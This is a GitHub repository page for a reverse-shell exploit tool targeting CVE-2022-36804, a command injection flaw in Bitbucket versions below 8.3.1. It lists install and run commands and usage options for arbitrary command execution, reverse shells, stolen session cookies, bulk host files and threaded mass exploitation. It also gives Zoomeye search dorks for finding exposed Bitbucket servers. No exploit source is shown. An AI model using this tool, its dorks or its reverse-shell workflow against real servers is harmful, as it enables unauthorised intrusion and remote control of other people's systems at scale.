Skip to content

Chocapikk/CVE-2022-36804-ReverseShell

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
Sep 24, 2022

Original Project

https://github.com/BenHays142/CVE-2022-36804-PoC-Exploit

CVE-2022-36804-PoC-Exploit

A somewhat reliable PoC exploit for CVE-2022-36804 (BitBucket Critical Command Injection). This attack generally requires public repos to be enabled, however session cookies are also compatible with this exploit. Note: this exploit includes automatic repo detection which is handy if you don't want to manually find open repos yourself.

How To Install

git clone https://github.com/Chocapikk/CVE-2022-36804-ReverseShell.git;
cd CVE-2022-36804-ReverseShell
python3 -m pip install -r requirements.txt
python3 main.py --server [target]

How To Use

usage: main.py [-h] [--server SERVER] [--project PROJECT] [--repo REPO] [--skip-auto]
               [--session SESSION] [--command CMD] [--file FILE] [--output OUTPUT]
               [--lhost LHOST] [--lport LPORT] [--threads THREADS]

Exploit BitBucket Instances (< v8.3.1) using CVE-2022-36804. Exploits automagically
without any extra parameters, but allows for custom settings as well.

options:
  -h, --help         show this help message and exit
  --server SERVER    Host to attack
  --project PROJECT  The name of the project the repository resides in
  --repo REPO        The name of the repository
  --skip-auto        Skip the automatic finding of exploitable repos
  --session SESSION  Value of 'BITBUCKETSESSIONID' cookie, useful if target repo is
                     private
  --command CMD      Command to execute if exploit is successful (Note: getting output
                     isn't reliable so OOB exfil is a must)
  --file FILE        File to scan bulk hosts
  --output OUTPUT    Output file for the session
  --lhost LHOST      Your Local Host for reverse shell
  --lport LPORT      Your Local Port for reverse shell
  --threads THREADS  Threads for mass exploitation

Zoomeye Dorks

app:"Bitbucket" +banner:"repos?visibility=public"

app:"Bitbucket" +title:"public"

app:"Bitbucket"

iconhash:667017222

References

Atlassian Advisory

Atlassian Jira Issue

NIST CVE

About

PoC exploit for CVE-2022-36804 (BitBucket Critical Command Injection)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages